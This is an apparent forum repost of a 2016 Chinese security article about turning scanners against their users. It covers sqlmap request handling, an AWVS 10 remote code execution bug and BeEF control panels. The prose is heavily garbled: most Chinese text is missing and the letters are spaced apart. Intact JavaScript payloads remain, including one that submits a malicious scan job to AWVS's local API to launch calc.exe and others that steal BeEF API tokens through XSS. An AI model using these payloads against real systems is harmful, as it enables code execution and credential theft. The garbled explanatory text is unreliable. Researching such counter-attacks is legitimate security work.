搜索

[10673] 2016-11-02_使用各种扫描工具的你,不但踩了“蜜罐”可能还要被团灭了

文档创建者:s7ckTeam
浏览次数:29
最后更新:2025-01-18
2016-11-02_使用各种扫描工具的你,不但踩了“蜜罐”可能还要被团灭了 使 e v i l 7   F r e e B u f   2 0 1 6 - 1 1 - 0 2 * e v i l 7 F r e e B u f 西 ( ` )   F B R M B 使 S q l m a p 西 S h o w #   F i r s t B l o o d S q l m a p   b a s h 使 S q l m a p s q l m a p
f o r m v a l u e v a l u e p a y l o a d u r l e n c o d e P O S T d a t a t a r g e t . p y u r l d e c o d e p a y l o a d u r l e n c o d e p a y l o a d p a y l o a d h e a d e r P O S T h e a d e r u r l e n c o d e s q l m a p h e a d e r H T T P _ H E A D E R . U S E R _ A G E N T h t t p s : / / g i t h u b . c o m / s q l m a p p r o j e c t / s q l m a p / b l o b / e 7 7 1 2 6 e 8 4 7 9 8 4 b 2 0 4 1 1 1 d 5 d a d a 9 4 1 7 b c 7 4 a 7 a 3 7 6 / l i b / c o r e / t a r g e t . p y # L 3 2 8 H T T P _ H E A D E R . R E F E R E R h t t p s : / / g i t h u b . c o m / s q l m a p p r o j e c t / s q l m a p / b l o b / e 7 7 1 2 6 e 8 4 7 9 8 4 b 2 0 4 1 1 1 d 5 d a d a 9 4 1 7 b c 7 4 a 7 a 3 7 6 / l i b / c o r e / t a r g e t . p y # L 3 3 6 H T T P _ H E A D E R . H O S T h t t p s : / / g i t h u b . c o m / s q l m a p p r o j e c t / s q l m a p / b l o b / e 7 7 1 2 6 e 8 4 7 9 8 4 b 2 0 4 1 1 1 d 5 d a d a 9 4 1 7 b c 7 4 a 7 a 3 7 6 / l i b / c o r e / t a r g e t . p y # L 3 4 6 h t t p s : / / g i t h u b . c o m / s q l m a p p r o j e c t / s q l m a p / b l o b / e 7 7 1 2 6 e 8 4 7 9 8 4 b 2 0 4 1 1 1 d 5 d a d a 9 4 1 7 b c 7 4 a 7 a 3 7 6 / l i b / c o r e / t a r g e t . p y # L 7 1 2 P O S T d a t a d a t a f i l e 使 使 d a t a ? P O S T d a t a G E T h t t p s : / / g i t h u b . c o m / s q l m a p p r o j e c t / s q l m a p / b l o b / e 7 7 1 2 6 e 8 4 7 9 8 4 b 2 0 4 1 1 1 d 5 d a d a 9 4 1 7 b c 7 4 a 7 a 3 7 6 / l i b / c o r e / t a r g e t . p y # L 3 6 5 r e p o s q l m a p g e t g e t h e a d e r g e t / p a c k a g e c o o k i e 西 s q l m a p c s r f - - d a t a - - c o o k i e - - a g e n t
H T T P _ H E A D E R . C S R F _ T O K E N h t t p s : / / g i t h u b . c o m / s q l m a p p r o j e c t / s q l m a p / b l o b / e 7 7 1 2 6 e 8 4 7 9 8 4 b 2 0 4 1 1 1 d 5 d a d a 9 4 1 7 b c 7 4 a 7 a 3 7 6 / l i b / c o r e / t a r g e t . p y # L 3 8 1 c s r f S q l m a p Y g e t p a y l o a d g e t 姿 g e t p o s t c s r f 2 0 i p c s r f p a y l o a d #   D o u b l e   k i l l A W V S   1 0   C V E - 2 0 1 5 - 4 0 2 7 A W V S   1 0   a p i 8 1 8 3 s y s t e m 访 h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 1 8 3 w e b a p i h t t p s : / / w w w . a c u n e t i x . c o m / b l o g / d o c s / a c u n e t i x - w v s - c l i - o p e r a t i o n / s y s t e m s y s t e m A W V S j s 怀 姿 A W V S - A p i j s p o c p a y l o a d p y t h o n h t t p s : / / w w w . e x p l o i t - d b . c o m / e x p l o i t s / 3 8 8 4 7 D o   y o u   w a n t   s q l m a p   t o   a u t o m a t i c a l l y   u p d a t e   i t   i n   f u r t h e r   r e q u e s t s ?   [ y / N ] / r u n < s c r i p t > v a r   t   =   n e w   D a t e ( ) v a r   y   =   t i m e . g e t F u l l Y e a r ( ) ; v a r   m   =   t i m e . g e t M o n t h ( ) ; v a r   d   =   t i m e . g e t D a t e ( ) ; v a r   h   =   t i m e . g e t H o u r s ( ) ; v a r   m i n   =   t i m e . g e t M i n u t e s ( ) + 1 ; v a r   c o m m a n d   =   " c a l c . e x e " ; v a r   p a d d i n g   =   " h t t p : / / " ; f o r ( i = 0 ; i < 2 0 4 8 ; i + + ) p a d d i n g + = " a " ; v a r   e x p   =   ' { " s c a n T y p e " : " s c a n " , " t a r g e t L i s t " : " " , " t a r g e t " : [ " ' + p a d d i n g + ' " ] , " r e c u r s e " : " - 1 " , " d a t e " : " ' + m + ' / ' + d + ' / ' + y + ' " , " d a y O f W e e k " : " 1 " , " d a y O f M o n t h " : " 1 " , " t " : " ' + h + ' : ' + m i n + ' " , " d e l e t e A f t e r C o m p l e t i o n " : " F a l s e " , " p a r a m s " : { " p r o f i l e " : " D e f a u l t " , " l o g i n S e q " : " < n o n e > " , " s e t t i n g s " : " D e f a u l t " , " s c a n n i n g m o d e " : " h e u r i s t i c " , " e x c l u d e d h o u r s " : " < n o n e > " , " s a v e t o d a t a b a s e " : " T r u e " , " s a v e l o g s " : " F a l s e " , " g e n e r a t e r e p o r t " : " F a l s e " , " r e p o r t f o r m a t " : " P D F " , " r e p o r t t e m p l a t e " : " W V S D e v e l o p e r R e p o r t . r e p   / C r a w l   h t t p : / / s c a n . w h a t   / R u n   " ' + c o m m a n d + '   " " , " e m a i l a d d r e s s " : " " } } ' v a r   x m l h t t p ; i f ( w i n d o w . X M L H t t p R e q u e s t ) {   x m l h t t p = n e w   X M L H t t p R e q u e s t ( ) ;   } e l s e {   x m l h t t p = n e w   A c t i v e X O b j e c t ( " M i c r o s o f t . X M L H T T P " ) ;   } x m l h t t p . o p e n ( " P O S T " , " h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 1 8 3 / a p i / a d d S c a n " , t r u e ) ; x m l h t t p . s e t R e q u e s t H e a d e r ( " C o n t e n t - t y p e " , " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d " ) ; x m l h t t p . s e t R e q u e s t H e a d e r ( " R e q u e s t V a l i d a t e d " , " t r u e " ) ; x m l h t t p . s e n d ( e x p ) ; < / s c r i p t >
h t t p s : / / w w w . e x p l o i t - d b . c o m / e x p l o i t s / 3 9 7 5 5 1 0 2 9 #   T r i p l e   k i l l B e E F - F r a m e w o r k   j s B e e f p r o j e c t h t t p : / / b e e f p r o j e c t . c o m b e e f x s s b e e f b e e f 线 线 b e e f - p a n e l 线 b e e f 仿 f l a s h 西 s e v e r j s 西 b e e f d e v - t e r m i n a l s e r v e r
f 1 2 v a r f u n c t i o n j s 使 b e e f , b e e f f u n c t i o n j s o n j s j s < s c r i p t > ( w i n d o w . b e e f ) ? a l e r t ( ' F o u n d   B e e f   i n j e c t ! ' ) : n u l l ; < / s c r i p t >
h o o k b e e f j s p a n e l b e e f X S S 访 B e E F R e s t f u l A p i T o k e n j s o n 1 0 2 9 A p i T o k e n j s o n b e e f r u b y p r i n t A p i T o k e n s e r v e r j s j q u e r y $ . g e t 访 b e e f T o k e n a l e r t l o g 1 0 3 0 b e e f A p i T o k e n T o k e n A d m i n T o k e n j s o n b e e f f u n c t i o n h t t p : / / 1 2 7 . 0 . 0 . 1 : 3 0 0 0 / u i / m o d u l e s / g e t R e s t f u l A p i T o k e n . j s o n < s c r i p t   s r c = ' h t t p : / / c d n . b o o t c s s . c o m / j q u e r y / 3 . 1 . 1 / j q u e r y . m i n . j s ' > < / s c r i p t > < s c r i p t > ( w i n d o w . b e e f ) ? a l e r t ( ' F o u n d   B e e f   i n j e c t ! n b f T o k e n :   ' + $ . g e t ( { u r l : " h t t p : / / 1 2 7 . 0 . 0 . 1 : 3 0 0 0 / u i / m o d u l e s / g e t R e s t f u l A p i T o k e n . j s o n " , a s y n c : f a l s e } ) . r e s p o n s e J S O N . t o k e n ) : n u l l ; < / s c r i p t >
b e e f b e e f X S S x h r A p i T o k e n 线 b e e f 线 A p i T o k e n / a l e r t a l e r t f u n c t i o n A p i s e s s i o n c o o k i e ~   j s j s < s c r i p t   s r c = ' h t t p : / / c d n . b o o t c s s . c o m / j q u e r y / 3 . 1 . 1 / j q u e r y . m i n . j s ' > < / s c r i p t > < s c r i p t >         v a r   b f P a t h   =   [ ' u i ' , ' a d m i n ' , ' b e e f ' , ' h a c k ' , ' x s s ' , ' m a n a g e r ' , ' d a s h b o a r d ' , ' t e s t ' , ' m e n u ' , ' 1 2 3 4 5 6 ' ] ;         v a r   b f H o s t   =   [ b e e f . n e t . h o s t , ' 1 2 7 . 0 . 0 . 1 ' , ' l o c a l h o s t ' , ' 0 . 0 . 0 . 0 ' ]         f u n c t i o n   g e t A p i ( h o s t ,   p a t h )   {                 r e t u r n   $ . g e t ( { u r l : b e e f . n e t . h t t p p r o t o + ' : / / ' + h o s t + ' : ' + b e e f . n e t . p o r t + ' / ' + p a t h + ' / m o d u l e s / g e t R e s t f u l A p i T o k e n . j s o n ' , a s y n c : f a l s e } ) . r e s p o n s e J S O N ;                 }         ( w i n d o w . b e e f ) ? a l e r t ( ' F o u n d   B e e f J s   i n j e c t ! n n J s f i l e   i s : n ' + b e e f . n e t . h t t p p r o t o + ' : / / ' + b e e f . n e t . h o s t + ' : ' + b e e f . n e t . p o r t + b e e f . n e t . h o o k ) : n u l l ;         f o r   ( v a r   n = 0 ; n < b f H o s t . l e n g t h ; n + + )   {                 v a r   h   =   b f H o s t [ n ] ;                 f o r   ( v a r   i = 0 ; i < b f P a t h . l e n g t h ; i + + )   {                         v a r   p   =   b f P a t h [ i ] ;                         ( g e t A p i ( h , p ) ) ? a l e r t ( ' F o u n d   B e e f   i s   O n l i n e ! : n n S e r v e r   A t : n ' + b e e f . n e t . h t t p p r o t o + ' : / / ' + h + ' : ' + b e e f . n e t . p o r t + ' / ' + p + ' / p a n e l ' + ' n A p i T o k e n : n ' + g e t A p i ( h , p ) . t o k e n ) : n u l l ;                 }         } < / s c r i p t > b f P a t h b f H o s t l o c a l h o s t
/ / / g e t ~ p a n e l c o o k i e R E S T f u l A p i A p i S e s s i o n 使 A p i X S S i f ( b l a b l a l b a ) { d o   b l a b l a b l a } c o n s o l e e r r o r b e e f d e v T e r m i n a l ~ b e e f A P I B e E F - R E S T f u l - A P I B e e f 2 A p i D o c m s f _ p a y l o a d f l a s h w e b p a y l o a d 访 b e e f C o n f i g ( ) b e e f ~ ~ ~ (   ω   ) #     ( Д   ) ~ 西 b e e f ~ #   1 2 7 . 0 . 0 . 1 0 . 0 . 0 . 0 1 9 2 . 1 6 8 . x . x u i / n i _ j u e _ d u i _ z h a o _ b u _ d a o _ w o _ l a l a l a _ 5 6 7 8 9 / p a n e l
姿 1 f u n c t i o n v a r 2 3 b a n 3 0 f u n c t i o n x x m a r k ~ #   b e e f * e v i l 7 F r e e B u f
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理